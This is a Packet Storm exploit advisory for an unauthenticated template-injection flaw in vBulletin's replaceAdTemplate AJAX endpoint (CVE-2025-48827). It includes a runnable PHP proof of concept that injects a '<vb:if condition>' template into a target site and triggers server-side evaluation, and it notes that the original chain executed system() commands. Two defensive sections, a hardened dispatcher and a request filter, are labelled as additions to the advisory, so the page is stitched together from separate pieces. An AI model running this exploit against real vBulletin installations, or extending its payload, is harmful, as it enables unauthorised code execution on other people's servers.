📄 vBulletin 6.0.3 replaceAdTemplate Expression Injection

🗓️ 26 Nov 2025 00:00:00 · Reported by indoushka · Type: packetstorm
🔗 packetstorm.news

Unauthenticated injection in vBulletin replaces templates to enable server side execution via template conditions.

Related

| Family | Title | Published |
|---|---|---|
| GithubExploit | Exploit for Improper Protection of Alternate Path in Vbulletin | 31 May 2025 15:23 |
| GithubExploit | Exploit for Improper Protection of Alternate Path in Vbulletin | 14 Jul 2025 02:17 |
| Circl | CVE-2025-48827 | 27 May 2025 04:47 |
| CNNVD | Internet Brands vBulletin security vulnerability | 27 May 2025 00:00 |
| CVE | CVE-2025-48827 | 27 May 2025 00:00 |
| Cvelist | CVE-2025-48827 | 27 May 2025 00:00 |
| EUVD | EUVD-2025-28267 | 27 May 2025 00:00 |
| Nuclei | vBulletin 5.0.0-6.0.3 - Authentication Bypass | 3 Jun 2026 06:04 |
| Nuclei | vBulletin replaceAdTemplate - Remote Code Execution | 2 Jun 2026 10:14 |
| NVD | CVE-2025-48827 | 27 May 2025 04:15 |
=============================================================================================================================================
    | # Title     : vBulletin 5.0.0 → 6.0.3 replaceAdTemplate Expression Injection                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.vbulletin.com/                                                                                                  |
    =============================================================================================================================================
    
    [+] Summary : 
    
    A design flaw in vBulletin's AJAX API (`ajax/api/ad/replaceAdTemplate`) allows
    unauthenticated attackers to inject arbitrary template conditions that execute
    server-side during rendering via `ajax/render/ad_<location>`.
    
    The original exploit chain enables remote command execution via `system()`
    wrapped inside template expressions. 
    
    The PoC evaluates a harmless PHP expression (`var_dump()`) inside a
    template and checks for execution by looking for a unique marker in the output.
    
    
    [+] References : https://packetstorm.news/files/id/200973/ ( CVE-2025-48827 )
    
    The flaw arises from:
    
    • Misuse of PHP Reflection in vBulletin's API dispatch.  
    • Missing access control for protected API methods.  
    • Template engine evaluating embedded PHP conditions inside `<vb:if>`.  
    • PHP 8.1+ behavior allowing direct invocation of protected methods.
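    The following is an added illustration of the dispatch weakness listed above; it is not vBulletin's code. It models a hypothetical AJAX dispatcher that resolves `ajax/api/<class>/<method>` through PHP reflection. Since PHP 8.1 `ReflectionMethod::setAccessible()` is a no-op and reflection can invoke protected and private methods directly, so a dispatcher that relies on visibility alone exposes every method of the controller. The hardened variant below checks an explicit allow-list and `isPublic()` before invoking. The class `AdApi`, its methods and the function names are assumptions made for this example.

```php
<?php
// Added example (not vBulletin code): a reflection-based API dispatcher and
// its hardened form. AdApi and its methods are hypothetical stand-ins.

class AdApi
{
    // Public: intended to be reachable through the HTTP API layer.
    public function fetchAd(string $location): string
    {
        return "ad for " . $location;
    }

    // Protected: an internal helper that the HTTP layer must never dispatch to,
    // because its $template argument is evaluated by the template engine.
    protected function replaceAdTemplate(string $location, string $template): string
    {
        return "template for $location replaced";
    }
}

// Weak dispatcher: hands the method name from the request straight to reflection.
// On PHP >= 8.1 invokeArgs() succeeds even though the method is protected;
// on PHP < 8.1 this throws ReflectionException for non-public methods.
function dispatchWeak(object $controller, string $method, array $args): string
{
    $ref = new ReflectionMethod($controller, $method);
    return (string) $ref->invokeArgs($controller, $args);
}

// Hardened dispatcher: only routes methods that are both on an explicit
// allow-list and public, and never magic or static methods.
function dispatchHardened(object $controller, string $method, array $args, array $allow): string
{
    if (!in_array($method, $allow, true)) {
        throw new RuntimeException("method not routable: $method");
    }
    $ref = new ReflectionMethod($controller, $method);
    if (!$ref->isPublic() || $ref->isStatic() || str_starts_with($method, '__')) {
        throw new RuntimeException("method not public: $method");
    }
    return (string) $ref->invokeArgs($controller, $args);
}

$api   = new AdApi();
$allow = ['fetchAd']; // the only method this controller exposes over HTTP

// Weak path: the protected method is reached from request-controlled input.
try {
    echo "weak: ", dispatchWeak($api, 'replaceAdTemplate', ['slot', '<vb:if condition="1"></vb:if>']), "\n";
} catch (ReflectionException $e) {
    echo "weak: reflection refused (PHP < 8.1): ", $e->getMessage(), "\n";
}

// Hardened path: the same call is rejected, while the public method still works.
try {
    dispatchHardened($api, 'replaceAdTemplate', ['slot', '<vb:if condition="1"></vb:if>'], $allow);
} catch (RuntimeException $e) {
    echo "hardened: blocked: ", $e->getMessage(), "\n";
}
echo "hardened: ", dispatchHardened($api, 'fetchAd', ['header'], $allow), "\n";
```

    The allow-list is the important half of the fix: checking `isPublic()` alone still lets a client call any public method the class happens to have, so the routable surface should be declared positively rather than inferred from visibility.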
    
    Two unauthenticated requests are used:
    
    1) Inject a custom ad template using `replaceAdTemplate`.  
    2) Trigger execution by calling `render/ad_<location>`.
    
    If the template condition executes, the response will contain a unique marker.
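    As an added detection example (not part of the advisory), the function below classifies vBulletin AJAX requests using only the parameters the advisory names: the `routestring` value, the `template` field carrying a `<vb:if condition=...>` block, and renders of `ad_<location>` slots. The request records are constructed samples, the `authenticated` flag and `KNOWN_AD_LOCATIONS` list are assumptions of this example (an operator would substitute the ad locations actually configured), and the function is meant to run in a request filter or over parsed request logs where the POST body is available.

```php
<?php
// Added detection example (not vBulletin code). Request records below are
// constructed; 'authenticated' and KNOWN_AD_LOCATIONS are assumptions.

const KNOWN_AD_LOCATIONS = ['header', 'footer']; // placeholder: replace with configured slots

// Returns a list of findings for one request; an empty list means nothing suspicious.
function inspectRequest(array $req): array
{
    $findings = [];
    $params   = $req['params'] ?? [];
    $route    = $params['routestring'] ?? '';

    // 1) Template replacement through the ad API. It is a protected method, so
    //    any client reaching it is noteworthy; unauthenticated callers are critical.
    if ($route === 'ajax/api/ad/replaceAdTemplate') {
        $findings[] = empty($req['authenticated'])
            ? 'CRITICAL: replaceAdTemplate called without a session'
            : 'WARN: replaceAdTemplate called (confirm caller is an administrator)';
    }

    // 2) A client-supplied template containing a condition. Conditions are
    //    evaluated server-side, so they should never originate from a browser.
    $template = $params['template'] ?? '';
    if (preg_match('/<vb:if\s+condition\s*=/i', $template)) {
        $findings[] = 'CRITICAL: template condition supplied by client';
    }

    // 3) Rendering an ad location that is not one of the configured slots,
    //    which is how an injected template is triggered.
    if (preg_match('#^ajax/render/ad_(.+)$#', $route, $m)
        && !in_array($m[1], KNOWN_AD_LOCATIONS, true)) {
        $findings[] = 'WARN: render of unknown ad location ' . $m[1];
    }

    return $findings;
}

// Constructed sample requests: one benign render, then the two-step pattern.
$samples = [
    ['src' => '203.0.113.10', 'authenticated' => true,
     'params' => ['routestring' => 'ajax/render/ad_header']],
    ['src' => '198.51.100.7', 'authenticated' => false,
     'params' => ['routestring' => 'ajax/api/ad/replaceAdTemplate', 'styleid' => '1',
                  'location' => 'qzxwvu',
                  'template' => "<vb:if condition='\"var_dump('abcdef')\"'></vb:if>"]],
    ['src' => '198.51.100.7', 'authenticated' => false,
     'params' => ['routestring' => 'ajax/render/ad_qzxwvu', 'kjhgfd' => 'YWJjZGVm']],
];

foreach ($samples as $i => $req) {
    $findings = inspectRequest($req);
    printf("request %d from %s: %s\n", $i + 1, $req['src'],
        $findings ? implode('; ', $findings) : 'ok');
}
```

    Correlating finding 1 with a later finding 3 from the same source, as the sample requests do, reproduces the two-request sequence the advisory describes and is a stronger signal than either request alone. Access logs that record only the URL will not show `routestring`, since vBulletin passes it in the POST body, so the filter has to run where the body is parsed.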
    
    
    --------------------------------------------------------------------
    ### SAFE PHP POC
    --------------------------------------------------------------------
    <?php
    /*
     * vBulletin replaceAdTemplate
     * by Indoushka — Packet Storm Edition
     */
    
    $target = "http://victim.com/"; // Change to target installation
    
    $marker   = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, 6);
    $location = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, 6);
    $param    = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, 6);
    
    $condition = "\"var_dump('$marker')\"";
    $template  = "<vb:if condition='$condition'></vb:if>";
    
    /* ----------------------------
       1) Inject Template
       ---------------------------- */
    $post1 = [
        'routestring' => 'ajax/api/ad/replaceAdTemplate',
        'styleid'     => '1',
        'location'    => $location,
        'template'    => $template
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $inj_response = curl_exec($ch);
    curl_close($ch);
    
    echo "=== Injection Response ===\n";
    echo $inj_response . "\n\n";
    
    /* ----------------------------
       2) Trigger Execution
       ---------------------------- */
    $trigger_value = base64_encode($marker);
    
    $post2 = [
        'routestring' => "ajax/render/ad_$location",
        $param        => $trigger_value
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $render_response = curl_exec($ch);
    curl_close($ch);
    
    echo "=== Trigger Response ===\n";
    echo $render_response . "\n\n";
    
    if (strpos($render_response, $marker) !== false) {
        echo "[+] Vulnerable: Marker detected → Template executed.\n";
    } else {
        echo "[-] Not Vulnerable.\n";
    }
    ?>
    
    ------------------------------------------------------------------------------
    4. Save & Run Instructions
    ------------------------------------------------------------------------------
    
    Save the PoC as:
        vb_safe_poc.php
    
    Run it using:
        php vb_safe_poc.php
    
    If vulnerable, output includes:
        [+] Vulnerable: Marker detected …
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
